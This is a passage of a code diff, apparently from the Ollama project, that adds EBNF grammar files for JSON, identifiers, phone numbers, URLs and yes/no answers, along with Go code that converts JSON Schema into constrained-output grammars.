|
||||
hex3 = hexdigit hexdigit hexdigit .
|
||||
hexdigit = "0" … "9" | "a" … "f" | "A" … "F" .
|
||||
3
x/grammar/grammars/identifier.ebnf
Normal file
3
x/grammar/grammars/identifier.ebnf
Normal file
@@ -0,0 +1,3 @@
|
||||
ident = letter { letter | digit | "_" } .
|
||||
letter = "a" … "z" | "A" … "Z" | "_" .
|
||||
digit = "0" … "9" .
|
||||
16
x/grammar/grammars/json.ebnf
Normal file
16
x/grammar/grammars/json.ebnf
Normal file
@@ -0,0 +1,16 @@
|
||||
value = object | array | string | number | "true" | "false" | "null" .
|
||||
object = "{" [ members ] "}" .
|
||||
members = pair { "," pair } .
|
||||
pair = string ":" value .
|
||||
array = "[" [ elements ] "]" .
|
||||
elements = value { "," value } .
|
||||
string = "\"" { char } "\"" .
|
||||
char = unescaped | escaped .
|
||||
unescaped = " " | "!" | "#" … "[" | "]" … "~" .
|
||||
escaped = "\\" ( "\"" | "\\" | "/" | "b" | "f" | "n" | "r" | "t" ) .
|
||||
number = [ "-" ] integer [ fraction ] [ exponent ] .
|
||||
integer = "0" | onenine { digit } .
|
||||
fraction = "." digit { digit } .
|
||||
exponent = ( "e" | "E" ) [ "+" | "-" ] digit { digit } .
|
||||
onenine = "1" … "9" .
|
||||
digit = "0" … "9" .
|
||||
27
x/grammar/grammars/json_array.ebnf
Normal file
27
x/grammar/grammars/json_array.ebnf
Normal file
@@ -0,0 +1,27 @@
|
||||
root = array .
|
||||
|
||||
value = object | array | string | number | "true" | "false" | "null" .
|
||||
|
||||
object = "{" ws "}" | "{" members "}" .
|
||||
members = member { "," member } .
|
||||
member = ws string ws ":" element .
|
||||
|
||||
array = "[" ws "]" | "[" elements "]" .
|
||||
elements = element { "," element } .
|
||||
element = ws value ws .
|
||||
|
||||
string = "\"" { character } "\"" .
|
||||
character = unescaped | escaped .
|
||||
unescaped = " " | "!" | "#" … "[" | "]" … "~" .
|
||||
escaped = "\\" ( "\"" | "\\" | "/" | "b" | "f" | "n" | "r" | "t" | unicode ) .
|
||||
unicode = "u" hex hex hex hex .
|
||||
hex = "0" … "9" | "A" … "F" | "a" … "f" .
|
||||
|
||||
number = [ "-" ] integer [ fraction ] [ exponent ] .
|
||||
integer = "0" | onenine { digit } .
|
||||
fraction = "." digit { digit } .
|
||||
exponent = ( "e" | "E" ) [ "+" | "-" ] digit { digit } .
|
||||
digit = "0" … "9" .
|
||||
onenine = "1" … "9" .
|
||||
|
||||
ws = { " " | "\t" | "\n" | "\r" } .
|
||||
4
x/grammar/grammars/list.ebnf
Normal file
4
x/grammar/grammars/list.ebnf
Normal file
@@ -0,0 +1,4 @@
|
||||
list = item { ", " item } .
|
||||
item = word .
|
||||
word = letter { letter } .
|
||||
letter = "a" … "z" | "A" … "Z" .
|
||||
19
x/grammar/grammars/people20.ebnf
Normal file
19
x/grammar/grammars/people20.ebnf
Normal file
@@ -0,0 +1,19 @@
|
||||
root = "[" ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person "," ws person { "," ws person } ws "]" .
|
||||
|
||||
person = "{" ws name_field "," ws age_field "," ws email_field ws "}" .
|
||||
|
||||
name_field = "\"" "n" "a" "m" "e" "\"" ws ":" ws string .
|
||||
age_field = "\"" "a" "g" "e" "\"" ws ":" ws number .
|
||||
email_field = "\"" "e" "m" "a" "i" "l" "\"" ws ":" ws string .
|
||||
|
||||
string = "\"" { character } "\"" .
|
||||
character = unescaped | escaped .
|
||||
unescaped = " " | "!" | "#" … "[" | "]" … "~" .
|
||||
escaped = "\\" ( "\"" | "\\" | "/" | "b" | "f" | "n" | "r" | "t" ) .
|
||||
|
||||
number = [ "-" ] integer .
|
||||
integer = "0" | onenine { digit } .
|
||||
digit = "0" … "9" .
|
||||
onenine = "1" … "9" .
|
||||
|
||||
ws = { " " | "\t" | "\n" | "\r" } .
|
||||
15
x/grammar/grammars/person.ebnf
Normal file
15
x/grammar/grammars/person.ebnf
Normal file
@@ -0,0 +1,15 @@
|
||||
root = "{" ws name_field "," ws age_field "," ws email_field ws "}" .
|
||||
|
||||
name_field = "\"name\"" ws ":" ws string .
|
||||
age_field = "\"age\"" ws ":" ws number .
|
||||
email_field = "\"email\"" ws ":" ws string .
|
||||
|
||||
string = "\"" { character } "\"" .
|
||||
character = " " | "!" | "#" … "~" .
|
||||
|
||||
number = [ "-" ] integer .
|
||||
integer = "0" | onenine { digit } .
|
||||
digit = "0" … "9" .
|
||||
onenine = "1" … "9" .
|
||||
|
||||
ws = { " " | "\t" | "\n" | "\r" } .
|
||||
7
x/grammar/grammars/phone.ebnf
Normal file
7
x/grammar/grammars/phone.ebnf
Normal file
@@ -0,0 +1,7 @@
|
||||
phone = parenformat | dashformat .
|
||||
parenformat = "(" areacode ") " exchange "-" subscriber .
|
||||
dashformat = areacode "-" exchange "-" subscriber .
|
||||
areacode = digit digit digit .
|
||||
exchange = digit digit digit .
|
||||
subscriber = digit digit digit digit .
|
||||
digit = "0" | "1" | "2" | "3" | "4" | "5" | "6" | "7" | "8" | "9" .
|
||||
11
x/grammar/grammars/url.ebnf
Normal file
11
x/grammar/grammars/url.ebnf
Normal file
@@ -0,0 +1,11 @@
|
||||
url = scheme "://" host [ ":" port ] [ path ] [ query ] .
|
||||
scheme = "http" | "https" .
|
||||
host = word { "." word } .
|
||||
port = digit { digit } .
|
||||
path = "/" { pathseg } .
|
||||
pathseg = word [ "/" ] .
|
||||
query = "?" param { "&" param } .
|
||||
param = word "=" word .
|
||||
word = alphanum { alphanum | "-" | "_" } .
|
||||
alphanum = "a" … "z" | "A" … "Z" | "0" … "9" .
|
||||
digit = "0" … "9" .
|
||||
3
x/grammar/grammars/yesno.ebnf
Normal file
3
x/grammar/grammars/yesno.ebnf
Normal file
@@ -0,0 +1,3 @@
|
||||
response = affirmative | negative .
|
||||
affirmative = "yes" | "Yes" | "YES" | "y" | "Y" | "true" | "True" .
|
||||
negative = "no" | "No" | "NO" | "n" | "N" | "false" | "False" .
|
||||
69
x/grammar/json.go
Normal file
69
x/grammar/json.go
Normal file
@@ -0,0 +1,69 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
// JSONGrammarEBNF is the EBNF grammar for JSON (character-level).
|
||||
// Based on https://www.json.org/json-en.html
|
||||
//
|
||||
// This grammar operates at the character level. The engine validates
|
||||
// tokens by matching them as sequences of these character-level terminals.
|
||||
const JSONGrammarEBNF = `
|
||||
json = value .
|
||||
|
||||
value = object | array | string | number | "true" | "false" | "null" .
|
||||
|
||||
object = "{" ws "}" | "{" members "}" .
|
||||
members = member { "," member } .
|
||||
member = ws string ws ":" element .
|
||||
|
||||
array = "[" ws "]" | "[" elements "]" .
|
||||
elements = element { "," element } .
|
||||
element = ws value ws .
|
||||
|
||||
string = "\"" { character } "\"" .
|
||||
character = unescaped | escaped .
|
||||
unescaped = " " | "!" | "#" … "[" | "]" … "~" .
|
||||
escaped = "\\" ( "\"" | "\\" | "/" | "b" | "f" | "n" | "r" | "t" | unicode ) .
|
||||
unicode = "u" hex hex hex hex .
|
||||
hex = "0" … "9" | "A" … "F" | "a" … "f" .
|
||||
|
||||
number = [ "-" ] integer [ fraction ] [ exponent ] .
|
||||
integer = "0" | onenine { digit } .
|
||||
fraction = "." digit { digit } .
|
||||
exponent = ( "e" | "E" ) [ "+" | "-" ] digit { digit } .
|
||||
digit = "0" … "9" .
|
||||
onenine = "1" … "9" .
|
||||
|
||||
ws = { " " | "\t" | "\n" | "\r" } .
|
||||
`
|
||||
|
||||
// JSONObjectGrammarEBNF is like JSONGrammarEBNF but only allows objects at the top level.
|
||||
const JSONObjectGrammarEBNF = `
|
||||
json = object .
|
||||
|
||||
value = object | array | string | number | "true" | "false" | "null" .
|
||||
|
||||
object = "{" ws "}" | "{" members "}" .
|
||||
members = member { "," member } .
|
||||
member = ws string ws ":" element .
|
||||
|
||||
array = "[" ws "]" | "[" elements "]" .
|
||||
elements = element { "," element } .
|
||||
element = ws value ws .
|
||||
|
||||
string = "\"" { character } "\"" .
|
||||
character = unescaped | escaped .
|
||||
unescaped = " " | "!" | "#" … "[" | "]" … "~" .
|
||||
escaped = "\\" ( "\"" | "\\" | "/" | "b" | "f" | "n" | "r" | "t" | unicode ) .
|
||||
unicode = "u" hex hex hex hex .
|
||||
hex = "0" … "9" | "A" … "F" | "a" … "f" .
|
||||
|
||||
number = [ "-" ] integer [ fraction ] [ exponent ] .
|
||||
integer = "0" | onenine { digit } .
|
||||
fraction = "." digit { digit } .
|
||||
exponent = ( "e" | "E" ) [ "+" | "-" ] digit { digit } .
|
||||
digit = "0" … "9" .
|
||||
onenine = "1" … "9" .
|
||||
|
||||
ws = { " " | "\t" | "\n" | "\r" } .
|
||||
`
|
||||
726
x/grammar/schema/schema.go
Normal file
726
x/grammar/schema/schema.go
Normal file
@@ -0,0 +1,726 @@
|
||||
//go:build mlx
|
||||
|
||||
// Package schema converts OpenAI-compatible JSON Schema into constrained grammars.
|
||||
package schema
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"regexp"
|
||||
"sort"
|
||||
"strings"
|
||||
|
||||
"github.com/ollama/ollama/x/grammar"
|
||||
)
|
||||
|
||||
// schemaNode represents OpenAI-compatible JSON Schema for structured outputs.
|
||||
// See: https://platform.openai.com/docs/guides/structured-outputs
|
||||
type schemaNode struct {
|
||||
// Core types
|
||||
Type interface{} `json:"type"` // string, []string, or nil
|
||||
|
||||
// Object properties
|
||||
Properties map[string]*schemaNode `json:"properties"`
|
||||
Required []string `json:"required"`
|
||||
AdditionalProperties interface{} `json:"additionalProperties"`
|
||||
|
||||
// Array properties
|
||||
Items *schemaNode `json:"items"`
|
||||
MinItems *int `json:"minItems"`
|
||||
MaxItems *int `json:"maxItems"`
|
||||
|
||||
// String properties
|
||||
Pattern string `json:"pattern"` // Regex pattern
|
||||
Format string `json:"format"` // date-time, email, uuid, etc.
|
||||
|
||||
// Number properties (noted but not enforced in grammar - validated post-generation)
|
||||
Minimum *float64 `json:"minimum"`
|
||||
Maximum *float64 `json:"maximum"`
|
||||
ExclusiveMinimum *float64 `json:"exclusiveMinimum"`
|
||||
ExclusiveMaximum *float64 `json:"exclusiveMaximum"`
|
||||
MultipleOf *float64 `json:"multipleOf"`
|
||||
|
||||
// Enum and const
|
||||
Enum []interface{} `json:"enum"`
|
||||
Const interface{} `json:"const"`
|
||||
|
||||
// Composition
|
||||
AnyOf []*schemaNode `json:"anyOf"`
|
||||
OneOf []*schemaNode `json:"oneOf"` // Treated same as anyOf for grammar
|
||||
|
||||
// References and definitions
|
||||
Ref string `json:"$ref"`
|
||||
Defs map[string]*schemaNode `json:"$defs"`
|
||||
|
||||
// Description (ignored for grammar but useful for docs)
|
||||
Description string `json:"description"`
|
||||
}
|
||||
|
||||
// converter handles JSON Schema to EBNF conversion with state.
|
||||
type converter struct {
|
||||
schema *schemaNode
|
||||
definitions map[string]*schemaNode // Resolved $defs
|
||||
usedTypes map[string]bool
|
||||
rules []string
|
||||
ruleNum int
|
||||
definedRefs map[string]bool // Track which refs we've already defined as rules
|
||||
}
|
||||
|
||||
// EBNF converts a JSON Schema to EBNF grammar
|
||||
func EBNF(schemaJSON string) (string, error) {
|
||||
var schema schemaNode
|
||||
if err := json.Unmarshal([]byte(schemaJSON), &schema); err != nil {
|
||||
return "", fmt.Errorf("failed to parse JSON Schema: %w", err)
|
||||
}
|
||||
|
||||
conv := &converter{
|
||||
schema: &schema,
|
||||
definitions: schema.Defs,
|
||||
usedTypes: make(map[string]bool),
|
||||
definedRefs: make(map[string]bool),
|
||||
}
|
||||
|
||||
return conv.convert()
|
||||
}
|
||||
|
||||
func (c *converter) convert() (string, error) {
|
||||
var b strings.Builder
|
||||
|
||||
// Generate root rule
|
||||
rootExpr := c.schemaToExpr(c.schema, "root")
|
||||
b.WriteString("root = ")
|
||||
b.WriteString(rootExpr)
|
||||
b.WriteString(" .\n")
|
||||
|
||||
// Add generated rules (refs, items, etc.)
|
||||
for _, rule := range c.rules {
|
||||
b.WriteString(rule)
|
||||
b.WriteString("\n")
|
||||
}
|
||||
|
||||
// Add primitives based on usage
|
||||
c.addPrimitives(&b)
|
||||
|
||||
return b.String(), nil
|
||||
}
|
||||
|
||||
func (c *converter) addPrimitives(b *strings.Builder) {
|
||||
if c.usedTypes["string"] {
|
||||
b.WriteString(`
|
||||
string = "\"" { character } "\"" .
|
||||
`)
|
||||
}
|
||||
|
||||
if c.usedTypes["string"] || c.usedTypes["character"] {
|
||||
b.WriteString(`
|
||||
character = unescaped | escaped .
|
||||
unescaped = " " | "!" | "#" … "[" | "]" … "~" .
|
||||
escaped = "\\" ( "\"" | "\\" | "/" | "b" | "f" | "n" | "r" | "t" | unicode ) .
|
||||
unicode = "u" hex hex hex hex .
|
||||
`)
|
||||
}
|
||||
|
||||
if c.usedTypes["number"] {
|
||||
b.WriteString(`
|
||||
number = [ "-" ] integer [ fraction ] [ exponent ] .
|
||||
integer = "0" | onenine { digit } .
|
||||
fraction = "." digit { digit } .
|
||||
exponent = ( "e" | "E" ) [ "+" | "-" ] digit { digit } .
|
||||
`)
|
||||
}
|
||||
|
||||
if c.usedTypes["integer"] {
|
||||
b.WriteString(`
|
||||
int = [ "-" ] ( "0" | onenine { digit } ) .
|
||||
`)
|
||||
}
|
||||
|
||||
if c.usedTypes["number"] || c.usedTypes["integer"] || c.usedTypes["digit"] {
|
||||
b.WriteString(`
|
||||
digit = "0" … "9" .
|
||||
`)
|
||||
}
|
||||
|
||||
// onenine only needed for number/integer, not for digit-only formats
|
||||
if c.usedTypes["number"] || c.usedTypes["integer"] {
|
||||
b.WriteString(`onenine = "1" … "9" .
|
||||
`)
|
||||
}
|
||||
|
||||
if c.usedTypes["string"] || c.usedTypes["character"] || c.usedTypes["hex"] {
|
||||
b.WriteString(`
|
||||
hex = "0" … "9" | "A" … "F" | "a" … "f" .
|
||||
`)
|
||||
}
|
||||
|
||||
if c.usedTypes["ws"] {
|
||||
b.WriteString(`
|
||||
ws = { " " | "\t" | "\n" | "\r" } .
|
||||
`)
|
||||
}
|
||||
}
|
||||
|
||||
func (c *converter) schemaToExpr(schema *schemaNode, name string) string {
|
||||
if schema == nil {
|
||||
c.usedTypes["string"] = true
|
||||
c.usedTypes["number"] = true
|
||||
return "( string | number | object | array | \"true\" | \"false\" | \"null\" )"
|
||||
}
|
||||
|
||||
// Handle $ref first
|
||||
if schema.Ref != "" {
|
||||
return c.resolveRef(schema.Ref)
|
||||
}
|
||||
|
||||
// Handle const
|
||||
if schema.Const != nil {
|
||||
return c.constToExpr(schema.Const)
|
||||
}
|
||||
|
||||
// Handle enum
|
||||
if len(schema.Enum) > 0 {
|
||||
return c.enumToExpr(schema.Enum)
|
||||
}
|
||||
|
||||
// Handle anyOf / oneOf
|
||||
if len(schema.AnyOf) > 0 {
|
||||
return c.anyOfToExpr(schema.AnyOf, name)
|
||||
}
|
||||
if len(schema.OneOf) > 0 {
|
||||
return c.anyOfToExpr(schema.OneOf, name)
|
||||
}
|
||||
|
||||
// Handle type
|
||||
types := c.getTypes(schema.Type)
|
||||
if len(types) == 0 {
|
||||
// No type specified, could be anything
|
||||
c.usedTypes["string"] = true
|
||||
c.usedTypes["number"] = true
|
||||
return "( string | number | \"true\" | \"false\" | \"null\" )"
|
||||
}
|
||||
|
||||
if len(types) == 1 {
|
||||
return c.typeToExpr(types[0], schema, name)
|
||||
}
|
||||
|
||||
// Multiple types (e.g., ["string", "null"])
|
||||
var parts []string
|
||||
for _, t := range types {
|
||||
parts = append(parts, c.typeToExpr(t, schema, name))
|
||||
}
|
||||
return "( " + strings.Join(parts, " | ") + " )"
|
||||
}
|
||||
|
||||
func (c *converter) typeToExpr(typeName string, schema *schemaNode, name string) string {
|
||||
switch typeName {
|
||||
case "object":
|
||||
return c.objectToExpr(schema, name)
|
||||
case "array":
|
||||
return c.arrayToExpr(schema, name)
|
||||
case "string":
|
||||
return c.stringToExpr(schema, name)
|
||||
case "number":
|
||||
c.usedTypes["number"] = true
|
||||
return "number"
|
||||
case "integer":
|
||||
c.usedTypes["integer"] = true
|
||||
c.usedTypes["digit"] = true
|
||||
return "int"
|
||||
case "boolean":
|
||||
return `( "true" | "false" )`
|
||||
case "null":
|
||||
return `"null"`
|
||||
default:
|
||||
c.usedTypes["string"] = true
|
||||
c.usedTypes["number"] = true
|
||||
return "string"
|
||||
}
|
||||
}
|
||||
|
||||
func (c *converter) objectToExpr(schema *schemaNode, name string) string {
|
||||
c.usedTypes["ws"] = true
|
||||
|
||||
if len(schema.Properties) == 0 {
|
||||
return `"{" ws "}"`
|
||||
}
|
||||
|
||||
// Sort properties for deterministic output
|
||||
// Required properties come first, in their required order
|
||||
var propOrder []string
|
||||
requiredSet := make(map[string]bool)
|
||||
for _, r := range schema.Required {
|
||||
requiredSet[r] = true
|
||||
propOrder = append(propOrder, r)
|
||||
}
|
||||
|
||||
// Add any non-required properties (though OpenAI requires all to be required)
|
||||
var optionalProps []string
|
||||
for propName := range schema.Properties {
|
||||
if !requiredSet[propName] {
|
||||
optionalProps = append(optionalProps, propName)
|
||||
}
|
||||
}
|
||||
sort.Strings(optionalProps)
|
||||
propOrder = append(propOrder, optionalProps...)
|
||||
|
||||
var propExprs []string
|
||||
first := true
|
||||
|
||||
for _, propName := range propOrder {
|
||||
propSchema, exists := schema.Properties[propName]
|
||||
if !exists {
|
||||
continue
|
||||
}
|
||||
|
||||
propExpr := c.schemaToExpr(propSchema, propName)
|
||||
|
||||
prefix := ""
|
||||
if !first {
|
||||
prefix = `"," ws `
|
||||
}
|
||||
first = false
|
||||
|
||||
propExprs = append(propExprs, fmt.Sprintf(`%s"\"%s\"" ws ":" ws %s`, prefix, propName, propExpr))
|
||||
}
|
||||
|
||||
if len(propExprs) == 0 {
|
||||
return `"{" ws "}"`
|
||||
}
|
||||
|
||||
return `"{" ws ` + strings.Join(propExprs, " ") + ` ws "}"`
|
||||
}
|
||||
|
||||
func (c *converter) arrayToExpr(schema *schemaNode, name string) string {
|
||||
c.usedTypes["ws"] = true
|
||||
|
||||
itemExpr := "value"
|
||||
if schema.Items != nil {
|
||||
itemExpr = c.schemaToExpr(schema.Items, name+"_item")
|
||||
} else {
|
||||
c.usedTypes["string"] = true
|
||||
c.usedTypes["number"] = true
|
||||
}
|
||||
|
||||
// Create item rule
|
||||
c.ruleNum++
|
||||
itemRule := fmt.Sprintf("item%d", c.ruleNum)
|
||||
c.rules = append(c.rules, fmt.Sprintf("%s = %s .", itemRule, itemExpr))
|
||||
|
||||
// Handle minItems/maxItems
|
||||
if schema.MinItems != nil || schema.MaxItems != nil {
|
||||
return c.arrayWithBounds(itemRule, schema.MinItems, schema.MaxItems)
|
||||
}
|
||||
|
||||
// Default: zero or more items
|
||||
return fmt.Sprintf(`( "[" ws "]" | "[" ws %s { "," ws %s } ws "]" )`, itemRule, itemRule)
|
||||
}
|
||||
|
||||
func (c *converter) arrayWithBounds(itemRule string, minItems, maxItems *int) string {
|
||||
min := 0
|
||||
max := -1 // unlimited
|
||||
|
||||
if minItems != nil {
|
||||
min = *minItems
|
||||
}
|
||||
if maxItems != nil {
|
||||
max = *maxItems
|
||||
}
|
||||
|
||||
if min == 0 && max < 0 {
|
||||
// No constraints
|
||||
return fmt.Sprintf(`( "[" ws "]" | "[" ws %s { "," ws %s } ws "]" )`, itemRule, itemRule)
|
||||
}
|
||||
|
||||
if min == 0 && max == 0 {
|
||||
return `"[" ws "]"`
|
||||
}
|
||||
|
||||
// Build pattern for bounded array
|
||||
// For min=2, max=4: item "," item [ "," item ] [ "," item ]
|
||||
var parts []string
|
||||
|
||||
// Required items
|
||||
for i := 0; i < min; i++ {
|
||||
if i > 0 {
|
||||
parts = append(parts, `"," ws`)
|
||||
}
|
||||
parts = append(parts, itemRule)
|
||||
}
|
||||
|
||||
// Optional items up to max
|
||||
if max > min {
|
||||
for i := min; i < max; i++ {
|
||||
if i == 0 {
|
||||
parts = append(parts, fmt.Sprintf(`[ %s`, itemRule))
|
||||
} else {
|
||||
parts = append(parts, fmt.Sprintf(`[ "," ws %s`, itemRule))
|
||||
}
|
||||
}
|
||||
// Close all optional brackets
|
||||
for i := min; i < max; i++ {
|
||||
parts = append(parts, "]")
|
||||
}
|
||||
} else if max < 0 {
|
||||
// Unlimited after min
|
||||
if min > 0 {
|
||||
parts = append(parts, fmt.Sprintf(`{ "," ws %s }`, itemRule))
|
||||
} else {
|
||||
parts = append(parts, fmt.Sprintf(`[ %s { "," ws %s } ]`, itemRule, itemRule))
|
||||
}
|
||||
}
|
||||
|
||||
if min == 0 {
|
||||
return fmt.Sprintf(`( "[" ws "]" | "[" ws %s ws "]" )`, strings.Join(parts, " "))
|
||||
}
|
||||
return fmt.Sprintf(`"[" ws %s ws "]"`, strings.Join(parts, " "))
|
||||
}
|
||||
|
||||
func (c *converter) stringToExpr(schema *schemaNode, name string) string {
|
||||
// Handle format
|
||||
if schema.Format != "" {
|
||||
return c.formatToExpr(schema.Format)
|
||||
}
|
||||
|
||||
// Handle pattern (regex)
|
||||
if schema.Pattern != "" {
|
||||
return c.patternToExpr(schema.Pattern, name)
|
||||
}
|
||||
|
||||
// Default string
|
||||
c.usedTypes["string"] = true
|
||||
if name == "root" {
|
||||
c.usedTypes["character"] = true
|
||||
return `"\"" { character } "\""`
|
||||
}
|
||||
return "string"
|
||||
}
|
||||
|
||||
func (c *converter) formatToExpr(format string) string {
|
||||
switch format {
|
||||
case "date":
|
||||
// YYYY-MM-DD
|
||||
c.ruleNum++
|
||||
c.usedTypes["digit"] = true
|
||||
ruleName := fmt.Sprintf("date%d", c.ruleNum)
|
||||
c.rules = append(c.rules, fmt.Sprintf(`%s = "\"" digit digit digit digit "-" digit digit "-" digit digit "\"" .`, ruleName))
|
||||
return ruleName
|
||||
|
||||
case "time":
|
||||
// HH:MM:SS
|
||||
c.ruleNum++
|
||||
c.usedTypes["digit"] = true
|
||||
ruleName := fmt.Sprintf("time%d", c.ruleNum)
|
||||
c.rules = append(c.rules, fmt.Sprintf(`%s = "\"" digit digit ":" digit digit ":" digit digit "\"" .`, ruleName))
|
||||
return ruleName
|
||||
|
||||
case "date-time":
|
||||
// YYYY-MM-DDTHH:MM:SSZ or with offset
|
||||
c.ruleNum++
|
||||
c.usedTypes["digit"] = true
|
||||
ruleName := fmt.Sprintf("datetime%d", c.ruleNum)
|
||||
c.rules = append(c.rules, fmt.Sprintf(`%s = "\"" digit digit digit digit "-" digit digit "-" digit digit "T" digit digit ":" digit digit ":" digit digit ( "Z" | ( "+" | "-" ) digit digit ":" digit digit ) "\"" .`, ruleName))
|
||||
return ruleName
|
||||
|
||||
case "email":
|
||||
// Simplified email pattern
|
||||
c.ruleNum++
|
||||
ruleName := fmt.Sprintf("email%d", c.ruleNum)
|
||||
c.rules = append(c.rules, fmt.Sprintf(`%s = "\"" emailchar { emailchar } "@" emailchar { emailchar } "." emailchar { emailchar } "\"" .`, ruleName))
|
||||
c.rules = append(c.rules, `emailchar = "a" … "z" | "A" … "Z" | "0" … "9" | "." | "-" | "_" .`)
|
||||
return ruleName
|
||||
|
||||
case "uuid":
|
||||
// 8-4-4-4-12 hex pattern
|
||||
c.ruleNum++
|
||||
ruleName := fmt.Sprintf("uuid%d", c.ruleNum)
|
||||
c.usedTypes["hex"] = true
|
||||
c.rules = append(c.rules, fmt.Sprintf(`%s = "\"" hex hex hex hex hex hex hex hex "-" hex hex hex hex "-" hex hex hex hex "-" hex hex hex hex "-" hex hex hex hex hex hex hex hex hex hex hex hex "\"" .`, ruleName))
|
||||
return ruleName
|
||||
|
||||
case "ipv4":
|
||||
c.ruleNum++
|
||||
c.usedTypes["digit"] = true
|
||||
ruleName := fmt.Sprintf("ipv4_%d", c.ruleNum)
|
||||
c.rules = append(c.rules, fmt.Sprintf(`%s = "\"" digit { digit } "." digit { digit } "." digit { digit } "." digit { digit } "\"" .`, ruleName))
|
||||
return ruleName
|
||||
|
||||
case "uri", "hostname":
|
||||
// Fallback to general string for complex formats
|
||||
c.usedTypes["string"] = true
|
||||
return "string"
|
||||
|
||||
default:
|
||||
c.usedTypes["string"] = true
|
||||
return "string"
|
||||
}
|
||||
}
|
||||
|
||||
func (c *converter) patternToExpr(pattern string, name string) string {
|
||||
// Try to convert simple regex patterns to EBNF
|
||||
// This handles common cases; complex regex falls back to string
|
||||
|
||||
// Remove anchors
|
||||
pattern = strings.TrimPrefix(pattern, "^")
|
||||
pattern = strings.TrimSuffix(pattern, "$")
|
||||
|
||||
// Try to parse and convert
|
||||
expr, ok := c.regexToEBNF(pattern)
|
||||
if !ok {
|
||||
// Fallback to general string
|
||||
c.usedTypes["string"] = true
|
||||
return "string"
|
||||
}
|
||||
|
||||
c.ruleNum++
|
||||
ruleName := fmt.Sprintf("pattern%d", c.ruleNum)
|
||||
c.rules = append(c.rules, fmt.Sprintf(`%s = "\"" %s "\"" .`, ruleName, expr))
|
||||
return ruleName
|
||||
}
|
||||
|
||||
func (c *converter) regexToEBNF(pattern string) (string, bool) {
|
||||
// Simple regex to EBNF converter
|
||||
// Handles: literals, [a-z], [A-Z], [0-9], +, *, ?, basic groups
|
||||
|
||||
var result strings.Builder
|
||||
i := 0
|
||||
|
||||
for i < len(pattern) {
|
||||
ch := pattern[i]
|
||||
|
||||
switch ch {
|
||||
case '[':
|
||||
// Character class
|
||||
end := strings.Index(pattern[i:], "]")
|
||||
if end == -1 {
|
||||
return "", false
|
||||
}
|
||||
class := pattern[i+1 : i+end]
|
||||
ebnfClass, ok := c.charClassToEBNF(class)
|
||||
if !ok {
|
||||
return "", false
|
||||
}
|
||||
result.WriteString(ebnfClass)
|
||||
i += end + 1
|
||||
|
||||
case '(':
|
||||
// Group - find matching )
|
||||
depth := 1
|
||||
start := i + 1
|
||||
j := start
|
||||
for j < len(pattern) && depth > 0 {
|
||||
if pattern[j] == '(' {
|
||||
depth++
|
||||
} else if pattern[j] == ')' {
|
||||
depth--
|
||||
}
|
||||
j++
|
||||
}
|
||||
if depth != 0 {
|
||||
return "", false
|
||||
}
|
||||
groupContent := pattern[start : j-1]
|
||||
groupExpr, ok := c.regexToEBNF(groupContent)
|
||||
if !ok {
|
||||
return "", false
|
||||
}
|
||||
result.WriteString("( ")
|
||||
result.WriteString(groupExpr)
|
||||
result.WriteString(" )")
|
||||
i = j
|
||||
|
||||
case '|':
|
||||
result.WriteString(" | ")
|
||||
i++
|
||||
|
||||
case '+':
|
||||
// One or more - wrap previous in { } and add one required
|
||||
// This is a simplification
|
||||
return "", false // TODO: handle properly
|
||||
|
||||
case '*':
|
||||
// Zero or more - need to wrap previous
|
||||
return "", false // TODO: handle properly
|
||||
|
||||
case '?':
|
||||
// Optional - need to wrap previous in [ ]
|
||||
return "", false // TODO: handle properly
|
||||
|
||||
case '\\':
|
||||
// Escape sequence
|
||||
if i+1 >= len(pattern) {
|
||||
return "", false
|
||||
}
|
||||
next := pattern[i+1]
|
||||
switch next {
|
||||
case 'd':
|
||||
result.WriteString("digit")
|
||||
c.usedTypes["digit"] = true
|
||||
case 'w':
|
||||
result.WriteString(`( "a" … "z" | "A" … "Z" | "0" … "9" | "_" )`)
|
||||
case 's':
|
||||
result.WriteString(`( " " | "\t" )`)
|
||||
default:
|
||||
result.WriteString(fmt.Sprintf(`"%c"`, next))
|
||||
}
|
||||
i += 2
|
||||
|
||||
default:
|
||||
// Literal character
|
||||
if (ch >= 'a' && ch <= 'z') || (ch >= 'A' && ch <= 'Z') || (ch >= '0' && ch <= '9') || ch == '_' || ch == '-' || ch == '.' {
|
||||
result.WriteString(fmt.Sprintf(`"%c" `, ch))
|
||||
} else {
|
||||
// Special char, try to escape
|
||||
result.WriteString(fmt.Sprintf(`"%c" `, ch))
|
||||
}
|
||||
i++
|
||||
}
|
||||
}
|
||||
|
||||
return strings.TrimSpace(result.String()), true
|
||||
}
|
||||
|
||||
func (c *converter) charClassToEBNF(class string) (string, bool) {
|
||||
// Handle character classes like a-z, A-Z, 0-9
|
||||
if class == "a-zA-Z0-9_" || class == "a-zA-Z_" {
|
||||
return `( "a" … "z" | "A" … "Z" | "0" … "9" | "_" )`, true
|
||||
}
|
||||
if class == "a-zA-Z0-9" {
|
||||
return `( "a" … "z" | "A" … "Z" | "0" … "9" )`, true
|
||||
}
|
||||
if class == "a-z" {
|
||||
return `"a" … "z"`, true
|
||||
}
|
||||
if class == "A-Z" {
|
||||
return `"A" … "Z"`, true
|
||||
}
|
||||
if class == "0-9" {
|
||||
c.usedTypes["digit"] = true
|
||||
return "digit", true
|
||||
}
|
||||
|
||||
// Try to parse range patterns
|
||||
if matched, _ := regexp.MatchString(`^[a-zA-Z]-[a-zA-Z]$`, class); matched {
|
||||
return fmt.Sprintf(`"%c" … "%c"`, class[0], class[2]), true
|
||||
}
|
||||
if matched, _ := regexp.MatchString(`^[0-9]-[0-9]$`, class); matched {
|
||||
return fmt.Sprintf(`"%c" … "%c"`, class[0], class[2]), true
|
||||
}
|
||||
|
||||
return "", false
|
||||
}
|
||||
|
||||
func (c *converter) anyOfToExpr(schemas []*schemaNode, name string) string {
|
||||
var parts []string
|
||||
for i, s := range schemas {
|
||||
expr := c.schemaToExpr(s, fmt.Sprintf("%s_opt%d", name, i))
|
||||
parts = append(parts, expr)
|
||||
}
|
||||
return "( " + strings.Join(parts, " | ") + " )"
|
||||
}
|
||||
|
||||
func (c *converter) enumToExpr(values []interface{}) string {
|
||||
var parts []string
|
||||
for _, v := range values {
|
||||
parts = append(parts, c.constToExpr(v))
|
||||
}
|
||||
return "( " + strings.Join(parts, " | ") + " )"
